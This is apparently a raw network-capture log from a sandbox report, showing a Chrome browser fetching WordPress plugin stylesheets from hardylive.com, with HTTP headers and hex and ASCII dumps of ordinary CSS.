                                                        2025-03-11 18:02:35 UTC6844INData Raw: 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 6d 61 69 6c 73 74 65 72 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 20 2e 6d 61 69 6c 73 74 65 72 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 6e 65 72 20 2e 6d 61 69 6c 73 74 65 72 2d 77 72 61 70 70 65 72 2d 6c 61 62 65 6c 2d 61 6c 69 67 6e 2d 6c 65 66 74 20 2e 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 6d 61 69 6c 73 74 65 72 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 20 2e 6d 61 69 6c 73 74 65 72 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 2d 69 6e 6e 65 72 20 2e 6d 61 69 6c 73 74 65 72 2d 77 72 61 70 70 65 72 2d 6c 61 62 65 6c 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 2c 2e 6d 61 69 6c 73 74 65 72 2d 62 6c 6f 63 6b 2d 66 6f 72 6d 20 2e 6d 61 69 6c 73 74 65 72 2d 62 6c 6f 63 6b 2d 66 6f 72
                                                        Data Ascii: tent:flex-start}.mailster-block-form .mailster-block-form-inner .mailster-wrapper-label-align-left .submit-button{text-align:left}.mailster-block-form .mailster-block-form-inner .mailster-wrapper-label-align-center,.mailster-block-form .mailster-block-for


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449745198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:34 UTC610OUTGET /wp-content/plugins/image-map-pro-wordpress/css/image-map-pro.min.css?ver=5.3.2 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:35 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:33 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 52451
                                                        Connection: close
                                                        Last-Modified: Fri, 17 Sep 2021 14:30:52 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:35 UTC16179INData Raw: 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 46 6f 6e 74 41 77 65 73 6f 6d 65 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37 2e 30 29 3b 73 72 63 3a 75
                                                        Data Ascii: /*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:FontAwesome;src:url(../fonts/fontawesome-webfont.eot?v=4.7.0);src:u
                                                        2025-03-11 18:02:35 UTC16384INData Raw: 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 34 22 7d 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 35 22 7d 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 36 22 7d 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 37 22 7d 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 38 22 7d 2e 66 61 2d 61 70 70 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 39 22 7d 2e 66 61 2d 77 69 6e 64 6f 77 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65
                                                        Data Ascii: are:before{content:"\f174"}.fa-long-arrow-down:before{content:"\f175"}.fa-long-arrow-up:before{content:"\f176"}.fa-long-arrow-left:before{content:"\f177"}.fa-long-arrow-right:before{content:"\f178"}.fa-apple:before{content:"\f179"}.fa-windows:before{conte
                                                        2025-03-11 18:02:35 UTC16384INData Raw: 33 33 33 33 33 33 25 7d 2e 73 71 2d 63 6f 6c 2d 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 31 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 73 71 2d 63 6f 6c 2d 33 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 32 35 25 3b 66 6c 65 78 3a 30 20 30 20 32 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 32 35 25 7d 2e 73 71 2d 63 6f 6c 2d 34 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 73 71 2d 63 6f 6c 2d 35 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20
                                                        Data Ascii: 333333%}.sq-col-2{-ms-flex:0 0 16.666667%;flex:0 0 16.666667%;max-width:16.666667%}.sq-col-3{-ms-flex:0 0 25%;flex:0 0 25%;max-width:25%}.sq-col-4{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.333333%}.sq-col-5{-ms-flex:0 0 41.666667%;flex:0 0
                                                        2025-03-11 18:02:35 UTC3504INData Raw: 68 61 70 65 73 2d 6d 65 6e 75 2d 73 65 61 72 63 68 2d 62 6f 78 2d 69 6e 70 75 74 2d 77 72 61 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6c 65 78 3a 31 7d 2e 69 6d 70 2d 73 68 61 70 65 73 2d 6d 65 6e 75 2d 73 65 61 72 63 68 2d 62 6f 78 20 69 6e 70 75 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 33 35 70 78 20 30 20 31 35 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 3a 31 70
                                                        Data Ascii: hapes-menu-search-box-input-wrap{position:relative;flex:1}.imp-shapes-menu-search-box input{font-size:14px;line-height:40px;padding:0 35px 0 15px;width:100%;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;outline:0;border:1p


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449748198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:34 UTC611OUTGET /wp-content/plugins/user-registration/assets/css/user-registration.css?ver=4.1.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:35 UTC206INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:33 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 160861
                                                        Connection: close
                                                        Last-Modified: Wed, 05 Mar 2025 14:44:37 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:35 UTC16178INData Raw: 2e 75 72 2d 68 32 2c 2e 75 72 2d 68 33 2c 2e 75 72 2d 68 34 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 75 72 2d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 75 72 2d 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 75 72 2d 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 75 72 2d 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 75 72 2d 74 65 78 74 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 75 72 2d 74 65 78 74 2d 6d 75 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 28 31 38 32 2e 34 39 39 33 32 38 33 35 38 32 2c 31 38 36 2e 38 36
                                                        Data Ascii: .ur-h2,.ur-h3,.ur-h4{font-weight:600!important}.ur-h2{font-size:28px!important}.ur-h3{font-size:20px!important}.ur-h4{font-size:16px!important}.ur-text-center{text-align:center}.ur-text-right{text-align:right}.ur-text-muted{color:rgb(182.4993283582,186.86
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 73 77 61 6c 32 2d 6d 6f 64 61 6c 20 2e 73 77 61 6c 32 2d 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 72 67 62 28 37 36 2e 32 38 38 32 33 38 38 30 36 2c 38 34 2e 30 33 37 39 37 30 31 34 39 33 2c 31 31 38 2e 39 31 31 37 36 31 31 39 34 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 73 77 61 6c 32 2d 6d 6f 64 61 6c 20 2e 73 77 61 6c 32 2d 61 63 74 69 6f 6e 73 20 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61
                                                        Data Ascii: swal2-container .user-registration-swal2-modal .swal2-content{color:rgb(76.288238806,84.0379701493,118.911761194);font-size:1em;line-height:1.5}.swal2-container .user-registration-swal2-modal .swal2-actions button{margin-top:0;margin-bottom:0}.swal2-conta
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 31 39 32 2e 31 39 35 32 36 38 36 35 36 37 2c 31 39 35 2e 38 31 35 31 37 30 39 36 33 34 2c 32 31 32 2e 31 30 34 37 33 31 33 34 33 33 29 3b 6f 75 74 6c 69 6e 65 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 35 73 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 28 32 34 30 2e 34 33 39 32 38 33 35 38 32 31 2c 32 34 31 2e 33 35 32 32 37 31 33 37 30 34 2c 32 34 35 2e 34 36 30 37 31 36 34 31 37 39 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 31 30 32 2e 36 36 35 34 31 37 39 31 30 34 2c 31 30 39 2e 31 36 38 39 30 32 33 30 36 36 2c 31 33 38 2e 34 33 34 35 38 32 30 38 39 36 29 3b 68 65 69 67 68 74 3a 34 35 70 78 7d 2e 75 72 2d 66 72 6f 6e 74
                                                        Data Ascii: r-bottom:1px solid rgb(192.1952686567,195.8151709634,212.1047313433);outline:0;transition:all .35s;padding:10px 15px;background:rgb(240.4392835821,241.3522713704,245.4607164179);color:rgb(102.6654179104,109.1689023066,138.4345820896);height:45px}.ur-front
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 74 6f 72 2d 70 61 67 65 20 2e 75 72 2d 73 68 6f 72 74 63 6f 64 65 2d 66 6f 72 6d 2d 65 6d 62 65 64 2d 74 68 65 6d 65 7b 77 69 64 74 68 3a 32 36 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 30 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 62 6c 6f 63 6b 2d 65 64 69 74 6f 72 2d 70 61 67 65 20 2e 75 72 2d 73 68 6f 72 74 63 6f 64 65 2d 66 6f 72 6d 2d 65 6d 62 65 64 2d 74 68 65 6d 65 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 62 6f 78 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 62 6c 6f 63 6b 2d 65 64 69 74 6f 72 2d 70 61 67 65 20 2e 75 72 2d 73 68 6f 72 74 63 6f 64 65 2d 66 6f 72 6d 2d 65 6d 62 65 64 2d 74 68 65 6d 65 20 2e 75 72 2d 73 68 6f 72 74 63 6f 64 65 2d 66 6f 72 6d 2d 65 6d
                                                        Data Ascii: tor-page .ur-shortcode-form-embed-theme{width:260px!important;z-index:99980!important;margin-top:5px}.block-editor-page .ur-shortcode-form-embed-theme .tooltipster-box{margin-top:10px}.block-editor-page .ur-shortcode-form-embed-theme .ur-shortcode-form-em
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 64 65 72 65 64 3a 6e 6f 74 28 2e 6c 6f 67 69 6e 29 2c 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 70 61 67 65 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2e 75 72 2d 66 72 6f 6e 74 65 6e 64 2d 66 6f 72 6d 2d 2d 62 6f 72 64 65 72 65 64 3a 6e 6f 74 28 2e 6c 6f 67 69 6e 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 39 65 39 65 39 7d 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6d 65 6d 62 65 72 73 68 69 70 5f 70 61 67 65 5f 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6c 6f 67 69 6e 2d 66 6f 72 6d 73 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2e 75 72 2d 66 72 6f 6e 74 65 6e 64 2d 66 6f 72 6d 2d 2d 62 6f 72 64
                                                        Data Ascii: dered:not(.login),body.user-registration-page .user-registration.ur-frontend-form--bordered:not(.login){box-shadow:none;border:1px solid #e9e9e9}body.user-registration-membership_page_user-registration-login-forms .user-registration.ur-frontend-form--bord
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 29 2c 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6d 65 6d 62 65 72 73 68 69 70 5f 70 61 67 65 5f 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6c 6f 67 69 6e 2d 66 6f 72 6d 73 20 23 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 6e 6f 74 28 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 4d 79 41 63 63 6f 75 6e 74 29 3a 68 61 73 28 2e 75 72 2d 66 72 6f 6e 74 65 6e 64 2d 66 6f 72 6d 2d 2d 66 6c 61 74 29 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 20 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 66 69 6c 65 5d
                                                        Data Ascii: nput:not([type=checkbox]),body.user-registration-membership_page_user-registration-login-forms #user-registration:not(.user-registration-MyAccount):has(.ur-frontend-form--flat) .user-registration-form-login .ur-form-row .ur-form-grid input:not([type=file]
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 6e 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 20 2e 69 6e 70 75 74 2d 74 65 78 74 2c 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 70 61 67 65 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 6e 6f 74 28 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 4d 79 41 63 63 6f 75 6e 74 29 20 2e 75 72 2d 66 72 6f 6e 74 65 6e 64 2d 66 6f 72 6d 2d 2d 72 6f 75 6e 64 65 64 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 66 6f 72 6d 2d 6c 6f 67 69 6e 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 20 2e 69 6e 70 75 74 2d 74 65 78 74 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69
                                                        Data Ascii: n-form-login .ur-form-row .ur-form-grid .input-text,body.user-registration-page .user-registration:not(.user-registration-MyAccount) .ur-frontend-form--rounded .user-registration-form-login .ur-form-row .ur-form-grid .input-text{height:auto}body.user-regi
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 74 69 6f 6e 2d 6c 6f 67 69 6e 2d 66 6f 72 6d 73 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 6e 6f 74 28 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 4d 79 41 63 63 6f 75 6e 74 29 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 20 2e 75 72 2d 66 69 65 6c 64 2d 69 74 65 6d 20 2e 69 6e 70 75 74 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 70 61 67 65 20 23 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 6e 6f 74 28 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 4d 79 41 63 63 6f 75 6e 74 29 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 20 2e 75 72 2d 66 69 65 6c 64 2d 69 74 65 6d
                                                        Data Ascii: tion-login-forms .user-registration:not(.user-registration-MyAccount) .ur-form-row .ur-form-grid .ur-field-item .input-wrapper input,body.user-registration-page #user-registration:not(.user-registration-MyAccount) .ur-form-row .ur-form-grid .ur-field-item
                                                        2025-03-11 18:02:36 UTC16384INData Raw: 73 73 2d 6c 6f 67 69 6e 2c 62 6f 64 79 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6d 65 6d 62 65 72 73 68 69 70 5f 70 61 67 65 5f 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6c 6f 67 69 6e 2d 66 6f 72 6d 73 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 6e 6f 74 28 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 4d 79 41 63 63 6f 75 6e 74 29 20 2e 75 72 2d 66 72 6f 6e 74 65 6e 64 2d 66 6f 72 6d 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 66 6f 72 6d 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 3e 64 69 76 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 70 61 73 73 77 6f 72 64 6c 65 73 73 2d 6c 6f 67 69 6e 2c 62 6f 64 79 2e 75 73 65 72 2d 72 65 67
                                                        Data Ascii: ss-login,body.user-registration-membership_page_user-registration-login-forms .user-registration:not(.user-registration-MyAccount) .ur-frontend-form .user-registration-form .ur-form-row .ur-form-grid>div .user-registration-passwordless-login,body.user-reg
                                                        2025-03-11 18:02:36 UTC13611INData Raw: 65 5f 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6c 6f 67 69 6e 2d 66 6f 72 6d 73 20 23 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 6e 6f 74 28 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 4d 79 41 63 63 6f 75 6e 74 29 20 2e 75 72 2d 66 72 6f 6e 74 65 6e 64 2d 66 6f 72 6d 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 66 6f 72 6d 20 2e 75 72 2d 66 6f 72 6d 2d 72 6f 77 20 2e 75 72 2d 66 6f 72 6d 2d 67 72 69 64 20 2e 75 73 65 72 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 73 6f 63 69 61 6c 2d 63 6f 6e 6e 65 63 74 2d 6e 65 74 77 6f 72 6b 73 20 2e 75 72 73 63 2d 6e 65 74 77 6f 72 6b 2d 6c 69 73 74 73 2e 75 72 73 63 5f 74 68 65 6d 65 5f 34 20 2e 75 72 73 63 2d 6c 6f 67 69 6e 2d 6d 65 64 69 61 2c 62 6f 64 79 2e 75 73
                                                        Data Ascii: e_user-registration-login-forms #user-registration:not(.user-registration-MyAccount) .ur-frontend-form .user-registration-form .ur-form-row .ur-form-grid .user-registration-social-connect-networks .ursc-network-lists.ursc_theme_4 .ursc-login-media,body.us


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449738198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:34 UTC607OUTGET /wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:36 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:33 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 18143
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:36 UTC16179INData Raw: 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 37 32 30 65 65 63 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 37 32 30 65 65 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 23 66 63 66 62 66 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 39 65 36 65 64 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 39 35 38 65 30 39 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 63 6f 6e 74 65
                                                        Data Ascii: :root{--woocommerce:#720eec;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#720eec;--wc-primary-text:#fcfbfe;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#958e09;--wc-highligh-text:white;--wc-conte
                                                        2025-03-11 18:02:36 UTC1964INData Raw: 20 23 63 6f 6e 74 65 6e 74 2e 74 77 65 6e 74 79 65 6c 65 76 65 6e 7b 6d 61 72 67 69 6e 3a 30 20 37 2e 36 25 3b 77 69 64 74 68 3a 35 38 2e 34 25 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 74 77 65 6e 74 79 66 6f 75 72 74 65 65 6e 20 2e 74 66 77 63 7b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 31 30 70 78 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 34 37 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 74 77 65 6e 74 79 66 6f 75 72 74 65 65 6e 20 2e 74 66 77 63 20 2e 70 72 6f 64 75 63 74 20 2e 65 6e 74 72 79 2d 73 75 6d 6d 61 72 79 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 36 31 38 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 77 65 6e 74 79 66 6f 75 72 74 65 65 6e 20 2e 74 66 77 63 20 64 69 76 2e 70 72
                                                        Data Ascii: #content.twentyeleven{margin:0 7.6%;width:58.4%;float:left}.twentyfourteen .tfwc{padding:12px 10px 0;max-width:474px;margin:0 auto}.twentyfourteen .tfwc .product .entry-summary{padding:0!important;margin:0 0 1.618em!important}.twentyfourteen .tfwc div.pr


